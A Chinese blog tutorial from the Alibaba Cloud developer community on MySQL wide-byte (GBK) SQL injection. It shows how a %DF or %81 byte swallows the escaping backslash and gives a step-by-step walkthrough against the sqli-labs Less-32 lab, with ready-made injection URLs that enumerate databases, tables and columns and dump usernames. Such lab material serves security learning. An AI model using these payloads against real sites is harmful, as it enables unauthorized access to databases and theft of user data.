AI 助理
备案控制台
开发者社区 数据库 文章 正文

MySQL注入 -- 宽字节注入

2024-02-23 61
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
推荐场景:
学生管理系统数据库设计 搭建个人博客
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
云数据库 RDS MySQL,高可用系列 2核4GB
简介: MySQL注入 -- 宽字节注入

一、宽字节注入介绍

1、在注入点输入(')会被转义为(\')编码后为(%5c%27),只有把斜杆去掉才能注入

2、GBK编码表,%DF%5C正好组成( 運),所以会把\"吃掉",0X81-0XFE都可以

0a2653c851af460fa595bd959398a8f1.png

二、实例演示

1、获取数据库名称

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,database() --+

0eacb84100b54626af849e6b562bf92a.png

2、获取数据库security的表

http://192.168.139.129/sqli/Less-32/?id=1%df' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 --+

2d65d23f6d4748949b924e4057485923.png

3、获取下一个表

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1 --+

2e9b90b2ca334476abebe75bafe6eeaa.png

4、获取表名为users的字段名

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,column_name from information_schema.columns where table_name=0x7573657273 --+
http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,column_name from information_schema.columns where table_name=0x7573657273 limit 11,1--+

0a2653c851af460fa595bd959398a8f1.png

5、获取字段内容

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,username from users --+
http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,username from users limit 1,1 --+

0eacb84100b54626af849e6b562bf92a.png

禁止非法,后果自负

文章标签:
云数据库 RDS MySQL 版
关系型数据库
MySQL
数据库
安全
关键词:
云数据库 RDS MySQL 版字节
云数据库 RDS MySQL 版注入
云数据库 RDS MySQL 版注入字节
相关实践学习
如何快速连接云数据库RDS MySQL
本场景介绍如何通过阿里云数据管理服务DMS快速连接云数据库RDS MySQL,然后进行数据表的CRUD操作。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
sumith
目录
相关文章
秋说
|
7月前
|
SQL 关系型数据库 MySQL
【MySQL进阶之路丨第十四篇】一文带你精通MySQL重复数据及SQL注入
【MySQL进阶之路丨第十四篇】一文带你精通MySQL重复数据及SQL注入
秋说
109 0
磊哥聊Java
|
6月前
|
SQL 关系型数据库 MySQL
字节面试:MySQL自增ID用完会怎样?
字节面试:MySQL自增ID用完会怎样?
磊哥聊Java
74 0
字节面试:MySQL自增ID用完会怎样?
老板这功能得加钱
|
7月前
|
消息中间件 关系型数据库 MySQL
MySQL 到 Kafka 实时数据同步实操分享(1),字节面试官职级
MySQL 到 Kafka 实时数据同步实操分享(1),字节面试官职级
老板这功能得加钱
149 0
sumith
|
7月前
|
关系型数据库 MySQL
Mysql注入 -- 注入类型
Mysql注入 -- 注入类型
sumith
48 1
sumith
|
7月前
|
安全 关系型数据库 MySQL
Mysql注入 -- 数据库导出及读文件
Mysql注入 -- 数据库导出及读文件
sumith
124 0
sumith
|
7月前
|
安全 关系型数据库 MySQL
Mysql注入 -- 联合注入
Mysql注入 -- 联合注入
sumith
55 0
sumith
|
7月前
|
关系型数据库 MySQL 数据库
Mysql注入 -- 布尔注入
Mysql注入 -- 布尔注入
sumith
57 0
sumith
|
7月前
|
安全 关系型数据库 MySQL
Mysql注入 -- 延时注入
Mysql注入 -- 延时注入
sumith
134 0
sumith
|
7月前
|
安全 关系型数据库 MySQL
Mysql注入 -- 报错注入
Mysql注入 -- 报错注入
sumith
56 0
sumith
|
7月前
|
SQL 关系型数据库 MySQL
Mysql注入 -- 堆叠注入
Mysql注入 -- 堆叠注入
sumith
178 0

热门文章

最新文章

  • 1
    MySQL数据库下载安装教程(Windows&Linux)
  • 2
    MySQL常用函数:IF、SUM等用法
  • 3
    Python处理数据库:MySQL与SQLite详解 | python小知识
  • 4
    从新手到高手:彻底掌握MySQL表死锁
  • 5
    MySQL事务隔离级别及默认隔离级别的设置
  • 6
    Liunx部署java项目Tomcat、Redis、Mysql教程
  • 7
    Mysql索引:深入理解InnoDb聚集索引与MyisAm非聚集索引
  • 8
    MySQL导入.sql文件后数据库乱码问题
  • 9
    MySQL的插件式认证到底是干什么的?
  • 10
    数据库数据恢复—MYSQL数据库文件损坏的数据恢复案例
  • 1
    【MYSQL】 ——索引(B树B+树)、设计栈
    9
  • 2
    【MySQL】——数据查询_进阶操作(超详细)!!
    11
  • 3
    MySQL(条件约束)
    9
  • 4
    带你认识MySQL(前置介绍)
    16
  • 5
    【MySQL进阶篇】存储引擎(MySQL体系结构、InnoDB、MyISAM、Memory区别及特点、存储引擎的选择方案)
    34
  • 6
    【MySQL基础篇】事务(事务操作、事务四大特性、并发事务问题、事务隔离级别)
    65
  • 7
    MySQL/SqlServer跨服务器增删改查(CRUD)的一种方法
    28
  • 8
    【MySQL基础篇】MySQL约束语法
    34
  • 9
    【MySQL基础篇】盘点MySQL常用四大类函数
    13
  • 10
    【MySQL基础篇】全面学习总结SQL语法、DataGrip安装教程
    13

    • 相关课程

    更多
  • MySQL企业常见架构与调优经验分享
  • 云数据库MySQL版快速上手教程
  • 阿里云云原生数据仓库AnalyticDB MySQL版 使用教程
  • MySQL实战进阶
  • 数据库及SQL/MySQL基础
  • 云数据库MySQL快速入门

    • 相关电子书

    更多
  • One Box: 解读事务与分析一体化数据库 HybridDB for MySQL
  • One Box:解读事务与分析一体化数据库HybridDB for MySQL
  • 如何支撑HTAP场景-HybridDB for MySQL系统架构和技术演进

    • 相关实验场景

    更多
  • MySQL引擎及架构优化
  • 基于EBS部署高性能的MySQL服务
  • 5分钟上手Flink MySQL连接器
  • 云端MySQL的安装及应用
  • 手动部署MySQL数据库(Alibaba Cloud Linux 2)
  • 手动部署MySQL数据库(CentOS 7)

    • 推荐镜像

    更多
  • mysql
  • mariadb
  • postgresql
    • 下一篇
    手把手教你白嫖阿里云服务器(免费领服务器)